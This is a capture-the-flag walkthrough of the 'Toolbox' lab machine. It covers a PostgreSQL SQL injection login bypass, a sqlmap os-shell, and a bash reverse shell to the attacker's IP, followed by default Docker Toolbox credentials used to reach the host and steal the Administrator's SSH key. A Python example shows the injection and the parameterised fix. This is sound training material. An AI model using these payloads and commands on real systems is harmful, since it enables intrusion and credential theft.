Toolbox

Name: Toolbox
Release Date: 12 Mar 2021
Retire Date: 24 Apr 2021
OS: Other/IoT
Base Points: Easy - Retired [0]
Creator: MinatoTW
Pentest Workshop PDF: Toolbox.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.236

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have added all the autorecon outputs to the Pentest Workshop PDF. Looking at the FTP TCP 21 output, we see that anonymous access is allowed. When we FTP to the target, we see a docker-toolbox.exe that we can GET.

Between the docker-toolbox executable and Apache/2.4.38 (Debian) running on a Windows box, it is safe to assume that containers are running. Also, looking at the HTTPS TCP 443 output, we see a certificate entry for admin.megalogistic.com, which we add to our /etc/hosts file.

sudo vi /etc/hosts
i #to enter "Insert" mode
10.10.10.236 admin.megalogistic.com
ESC
:wq!
ENTER

Now navigate to https://10.10.10.236 and https://admin.megalogistic.com

In the login panel, try to log in with ' as the username and password. We will get an error message (barely legible with black text on a black background).


Warning: pg_query(): Query failed: ERROR: syntax error at or near ")" LINE 1: ...T * FROM users WHERE username = ''' AND password = md5('''); ^ in /var/www/admin/index.php on line 10

Warning: pg_num_rows() expects parameter 1 to be resource, bool given in /var/www/admin/index.php on line 11

This login is clearly vulnerable to SQLi authentication bypass. After trying several different payloads for PostgreSQL (we can tell it is in use from the pg_query and pg_num_rows functions in the error) from PayloadsAllTheThings, we finally find the right combination.

Username = admin' or 1=1 --

One downside is that we now need to use sqlmap to check out the database. I call it a downside because sqlmap is one of the tools banned during the OSCP exam. We still need to know how to use it, and based on the error we can deduce that the login query is something along the lines of:

SELECT * FROM users WHERE username = '{input user}' AND password = md5('{input password}');
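To see concretely why a query built this way is bypassable and what the fix looks like, here is an added Python example (not code from the box or from the writeup) that replays the deduced query against a constructed in-memory SQLite table, with a Python md5() registered to stand in for PostgreSQL's; the table contents and the login_* helper names are assumptions.

```python
import hashlib
import sqlite3


# Constructed stand-in for the box's PostgreSQL "users" table. SQLite has no
# md5(), so we register a Python one to mirror the md5() call in the deduced query.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1,
                         lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)",
                 (hashlib.md5(b"correct-horse").hexdigest(),))
    return conn


def login_vulnerable(conn, user, password):
    """Builds the query exactly as the writeup deduces it: user input is spliced
    straight into the SQL text, so quotes and comments change the statement."""
    sql = ("SELECT * FROM users WHERE username = '%s' "
           "AND password = md5('%s');" % (user, password))
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # A lone quote unbalances the literal: this is the "syntax error at or
        # near" that the login page leaks in its Warning line.
        return ("error", str(exc))
    return ("ok", len(rows) > 0)


def login_safe(conn, user, password):
    """Parameterised version: values travel separately from the SQL text, so the
    same input is compared as a literal username and the password is still checked."""
    sql = "SELECT * FROM users WHERE username = ? AND password = md5(?)"
    rows = conn.execute(sql, (user, password)).fetchall()
    return ("ok", len(rows) > 0)


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "'", "'"))                 # ('error', 'near ")": ...')
    print(login_vulnerable(db, "admin' or 1=1 --", "x"))  # ('ok', True)
    print(login_safe(db, "admin' or 1=1 --", "x"))        # ('ok', False)
    print(login_safe(db, "admin", "correct-horse"))       # ('ok', True)
```

The bypass works because the `--` comments out the password check entirely; the parameterised form never lets the input become part of the statement, which is the fix to look for in the application rather than in any WAF rule.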

So, we intercept the POST request for the login in Burp and save it to a file (toolbox.req). Then we use the following sqlmap command against that file. Since the pg_ prefix in the error means we're dealing with a PostgreSQL instance, let's jump straight to forcing an OS shell.

sqlmap -r toolbox.req --risk=3 --level=3 --batch --force-ssl --os-shell

Now that sqlmap has given us an os-shell, we can run a bash reverse shell to get a better shell.

On Attacking Machine:
nc -lvnp 1337

On Victim Machine:
bash -c 'bash -i >& /dev/tcp/<YOUR TUN0 IP>/1337 0>&1'

Change to the postgres home folder and grab the user.txt flag.

postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
f0183e44378ea9774433e2ca6ac78c6a  flag.txt

PRIVILEGE ESCALATION

We know that docker-toolbox uses VirtualBox to run the Docker host VM, that this VM is always the gateway address of the containers, and that it has default credentials of:

docker:tcuser

So, if we upgrade to a TTY shell using:

python3 -c 'import pty; pty.spawn("/bin/bash")'

we should be able to run ifconfig inside the container, read off its gateway address, and ssh to that address with those credentials. The documentation for this can be found here.

In the /c/Users/Administrator/.ssh folder is the private key for the Administrator user.

Copy that onto the Attacking machine.
chmod 400 id_rsa 
ssh -i id_rsa Administrator@10.10.10.236

Grab the root.txt flag and proof and this box is complete! Pop the champagne!

administrator@TOOLBOX C:\Users\Administrator\Desktop>type root.txt 
cc9a0b76ac17f8f475250738b96261b3